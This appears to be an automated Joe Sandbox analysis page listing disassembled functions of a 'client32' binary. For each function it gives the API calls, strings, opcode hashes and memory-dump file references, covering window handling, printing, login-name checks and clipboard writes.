Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: EnumServices returned %d$QueryServiceConfig2W$advapi32.dll
API String ID: 1889721586-3267302290
Opcode ID: 21b3c385728fcf88e82166965005ac8aff01d1b65566217e64c1eab89ee832e7
Instruction ID: 9fb7de677e030cfc0a01f6eedc798a2385bd80f55b8063cdc9a43f6634fa85b6
Opcode Fuzzy Hash: 21b3c385728fcf88e82166965005ac8aff01d1b65566217e64c1eab89ee832e7
Instruction Fuzzy Hash: 39E17575A006599FEB24CF24CD94FABF7B9AF84304F208699E91997240DF30AE85CF50

Function 110251B0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 384windowtimeCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 11025347
DrawMenuBar.USER32(?), ref: 1102535E
GetMenu.USER32(?), ref: 110253B3
DeleteMenu.USER32(00000000,00000001,00000400), ref: 110253C1
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1102531E

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

UpdateWindow.USER32(?), ref: 11025407
IsIconic.USER32(?), ref: 1102541A
SetTimer.USER32(00000000,00000000,000003E8,00000000), ref: 1102543A
KillTimer.USER32(00000000,00000000,00000080,00000002), ref: 110254A0

Strings

m_hWnd, xrefs: 110253F6
Chat, xrefs: 110251D8
..\ctl32\chatw.cpp, xrefs: 1102520A
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110253F1

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$TimerWindow$DeleteDrawErrorExitIconicKillLastMessageProcessUpdatewsprintf
String ID: ..\ctl32\chatw.cpp$Chat$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 3085788722-363603473
Opcode ID: e69d78fb2f8639c597be4dd6d8a4cfc2e884be2be3f7c90e4c2329286fe3b857
Instruction ID: b6232a099581f0ae497a3b344fdba13ecce31f738ecb0fc666d570829b7bf44f
Opcode Fuzzy Hash: e69d78fb2f8639c597be4dd6d8a4cfc2e884be2be3f7c90e4c2329286fe3b857
Instruction Fuzzy Hash: 14D1AC74B40702ABEB14DB64CC85FAEB3A5BB88708F104558F6529F3C1DAB1F941CB95

Function 11069690 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 283fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1106976B
OpenPrinterA.WINSPOOL.DRV(?,FFFFFFFF,00000000,?,?,CF3D35D0,?,?), ref: 11069824
StartDocPrinterA.WINSPOOL.DRV(FFFFFFFF,00000001,?,?,?,FFFFFFFF,00000000,?,?,CF3D35D0,?,?), ref: 1106989E
ClosePrinter.WINSPOOL.DRV(FFFFFFFF,FFFFFFFF,00000001,?,?,?,FFFFFFFF,00000000,?,?,CF3D35D0,?,?), ref: 110698AE
GetTickCount.KERNEL32 ref: 110699EC

Part of subcall function 11141430: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,75C07310), ref: 11141457

FindFirstFileA.KERNEL32(00000000,?,?,?,?,?,CF3D35D0,?,?), ref: 110698FC
FindClose.KERNEL32(00000000,?,?,?,?,CF3D35D0,?,?), ref: 11069908
CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000004,00000000,00000000,?,?,?,?,CF3D35D0,?,?), ref: 110699A0
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,CF3D35D0,?,?), ref: 110699C5
GetLastError.KERNEL32(?,?,?,?,?,CF3D35D0,?,?), ref: 11069A5A

Part of subcall function 11064CC0: EndPagePrinter.WINSPOOL.DRV(?), ref: 11064D92
Part of subcall function 11064CC0: EndDocPrinter.WINSPOOL.DRV(?), ref: 11064D98
Part of subcall function 11064CC0: ClosePrinter.WINSPOOL.DRV(?,?), ref: 11064D9E
Part of subcall function 11064CC0: Sleep.KERNEL32(000001F4), ref: 11064DDA

Strings

PrintCapture, xrefs: 11069964
Enable, xrefs: 1106995F
%s - %s, xrefs: 1106985F

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Printer.$CloseFile$CountFindPrinterTick$CreateEnvironmentErrorExpandFirstLastOpenPagePointerSleepStartStrings
String ID: %s - %s$Enable$PrintCapture
API String ID: 1834577849-1632956573
Opcode ID: ae0e2b07917c9480a31732071cb89b62829728e2d572fdd7287d9e264cc8dc22
Instruction ID: e673d2eda1cd691c3edaaa59946a8787050a6b5371973777754d889af3eb1648
Opcode Fuzzy Hash: ae0e2b07917c9480a31732071cb89b62829728e2d572fdd7287d9e264cc8dc22
Instruction Fuzzy Hash: ACB18E74E006169FDB20CF64CC88BDEB7B9BF85315F1046D9E419A7280EB75AA84CF50

Function 1103B220 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 189COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 1103B306
_free.LIBCMT ref: 1103B400

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

Part of subcall function 110CCAD0: FindResourceExA.KERNEL32(00000000,00000005,?,00000000), ref: 110CCB55
Part of subcall function 110CCAD0: LoadResource.KERNEL32(00000000,00000000), ref: 110CCB84
Part of subcall function 110CCAD0: LockResource.KERNEL32(00000000), ref: 110CCBA8
Part of subcall function 110CCAD0: CreateDialogIndirectParamA.USER32(00000000,00000000,1112A889,110CAE00,00000000), ref: 110CCBD9
Part of subcall function 110CCAD0: CreateDialogIndirectParamA.USER32(00000000,00000000,1112A889,110CAE00,00000000), ref: 110CCBF4
Part of subcall function 110CCAD0: GetLastError.KERNEL32 ref: 110CCC19

_calloc.LIBCMT ref: 1103B415
_free.LIBCMT ref: 1103B450

Strings

u, xrefs: 1103B266
Not logged in!, xrefs: 1103B365
CLTCONN.CPP, xrefs: 1103B319, 1103B428
Login name %s, xrefs: 1103B3C9
GetName, xrefs: 1103B296
DoUserLogin, xrefs: 1103B24E
, xrefs: 1103B39A
Get login name. Check if logged in, xrefs: 1103B32E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Resource$CreateDialogIndirectParam_calloc_free$ErrorFindLastLoadLock_memsetwsprintf
String ID: $CLTCONN.CPP$DoUserLogin$Get login name. Check if logged in$GetName$Login name %s$Not logged in!$u
API String ID: 3626227667-1552251038
Opcode ID: 01fd35b3c109e338554ba1db0897715522d16d727ac1624b289d742af69260c7
Instruction ID: 25b904e35b270628fa9a38861c68e686706e0c30f1396ea4e15f3982f5bea4d1
Opcode Fuzzy Hash: 01fd35b3c109e338554ba1db0897715522d16d727ac1624b289d742af69260c7
Instruction Fuzzy Hash: 97612674E41A1AEFD710DFA4CCC1FADF3A5AB8470DF104269EA265B2C0EB716940C792

Function 1115B180 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 440COMMON

Download Yara Rule

APIs

SetWindowLongA.USER32(?,000000FC,?), ref: 1115B1C6
RemovePropA.USER32(?), ref: 1115B1E5
RemovePropA.USER32(?), ref: 1115B1F4
RemovePropA.USER32(?,00000000), ref: 1115B203

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

CallWindowProcA.USER32(?,?,?,?,?), ref: 1115B55A

Strings

..\ctl32\wndclass.cpp, xrefs: 1115B198
old_wndproc, xrefs: 1115B19D

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: PropRemove$Window$CallErrorExitLastLongMessageProcProcesswsprintf
String ID: ..\ctl32\wndclass.cpp$old_wndproc
API String ID: 1777853711-3305400014
Opcode ID: c3063e6233cfac457fb0abdd6f1d250989d48feedc8840d264afa341f117270a
Instruction ID: ee076e1b1c12c59e2fd2c34d2ca2faed304bf4b043a58102cf48aae30fabbc62
Opcode Fuzzy Hash: c3063e6233cfac457fb0abdd6f1d250989d48feedc8840d264afa341f117270a
Instruction Fuzzy Hash: 43C17BB53041199FD748CE69E890E7FB3EAFBC8311B10466EF956C7781DA21AC118BB1

Function 1101F360 Relevance: 15.1, APIs: 10, Instructions: 54clipboardmemorywindowCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(?), ref: 1101F387
GlobalAlloc.KERNEL32(00002002,00000002), ref: 1101F397
GlobalLock.KERNEL32(00000000), ref: 1101F3A0
_memmove.LIBCMT ref: 1101F3A9
GlobalUnlock.KERNEL32(00000000), ref: 1101F3B2
EmptyClipboard.USER32 ref: 1101F3B8
SetClipboardData.USER32(00000001,00000000), ref: 1101F3C1
GlobalFree.KERNEL32(00000000), ref: 1101F3CC
MessageBeep.USER32(00000030), ref: 1101F3D4
CloseClipboard.USER32 ref: 1101F3DA

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClipboardGlobal$AllocBeepCloseDataEmptyFreeLockMessageOpenUnlock_memmove
String ID:
API String ID: 3255624709-0
Opcode ID: e34d2ed037c0cc0ce93fd965415a0307a16a5f75420eb2469a8d43960e23cf46
Instruction ID: a74b028ba7232528d54cbd7924e13de8c44cceb4ce50299c474c183637a6b5bc
Opcode Fuzzy Hash: e34d2ed037c0cc0ce93fd965415a0307a16a5f75420eb2469a8d43960e23cf46
Instruction Fuzzy Hash: 67019276A012636BD3026B748CCCE5FBBACDF55349704C079F626C6109EB74C8058762

Function 111575D0 Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 11157677
ShowWindow.USER32(?,00000009), ref: 11157687
BringWindowToTop.USER32(?), ref: 11157691
IsWindow.USER32(00000000), ref: 111576D0
IsIconic.USER32(00000000), ref: 111576DB
ShowWindow.USER32(00000000,00000009), ref: 111576E8
BringWindowToTop.USER32(00000000), ref: 111576EF

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$BringIconicShow
String ID:
API String ID: 2588442158-0
Opcode ID: 038ff0c7e592a338b47f23a8c12551223a3be2bd5e1829126b81d4076912602b
Instruction ID: a9c9b89abb11ca8be4b118751fbd9485df176094a83bcf99db43cce38e22dc7e
Opcode Fuzzy Hash: 038ff0c7e592a338b47f23a8c12551223a3be2bd5e1829126b81d4076912602b
Instruction Fuzzy Hash: D431E575A00A2A9FD751CF54D985BAEF7B8FF45714F00816AE921E3380EB35A901CFA1

Function 1101D180 Relevance: 4.6, APIs: 3, Instructions: 82timeCOMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 1101D213
SetRect.USER32(?,00000000,00000000,00000000,00000000), ref: 1101D232
GetLocalTime.KERNEL32(00000002), ref: 1101D25C

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LocalRectTime__time64
String ID:
API String ID: 394334608-0
Opcode ID: de18328b6b15506cedc7e23451f66c7985023e4612589437c270b1aaafaaec95
Instruction ID: 290189b485d165d605b85d0a399bd35ca550a15b876ac08f977e3d1591b43d19
Opcode Fuzzy Hash: de18328b6b15506cedc7e23451f66c7985023e4612589437c270b1aaafaaec95
Instruction Fuzzy Hash: 01316C75904B44DFD320CF68D944B9AFBE8EB48714F00896EE86AC7780DB34E904CB51

Function 11025600 Relevance: 4.6, APIs: 3, Instructions: 72windowthreadCOMMON

Download Yara Rule

APIs

IsIconic.USER32(00000000), ref: 11025636
BringWindowToTop.USER32(00000000), ref: 1102564C

Part of subcall function 110016C0: CloseHandle.KERNEL32(00000000,00000000,00000001,00000000), ref: 11001744

GetCurrentThreadId.KERNEL32 ref: 11025673

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: BringCloseCurrentHandleIconicThreadWindow
String ID:
API String ID: 282708701-0
Opcode ID: be7bb6cde0661da47d93028aa2f1066229653c34bc31b302c7f75b62c8a6ca65
Instruction ID: c3a6a97e4fdde05f755f246cac9ee4b44c497100eb01fdc4058d47c4523d8575
Opcode Fuzzy Hash: be7bb6cde0661da47d93028aa2f1066229653c34bc31b302c7f75b62c8a6ca65
Instruction Fuzzy Hash: 87210836A006059FE720CE59E4887EAB3E5BF88324F40C16AE55B87240CB76E845CF54

Function 11059270 Relevance: 4.5, APIs: 3, Instructions: 19windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,1105990A,DuplicateHandle), ref: 11059281
FormatMessageA.KERNEL32(00001100,00000000,00000000,?,?,1105990A,DuplicateHandle), ref: 1105928F
LocalFree.KERNEL32(?,?,?,1105990A,DuplicateHandle), ref: 11059299

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID:
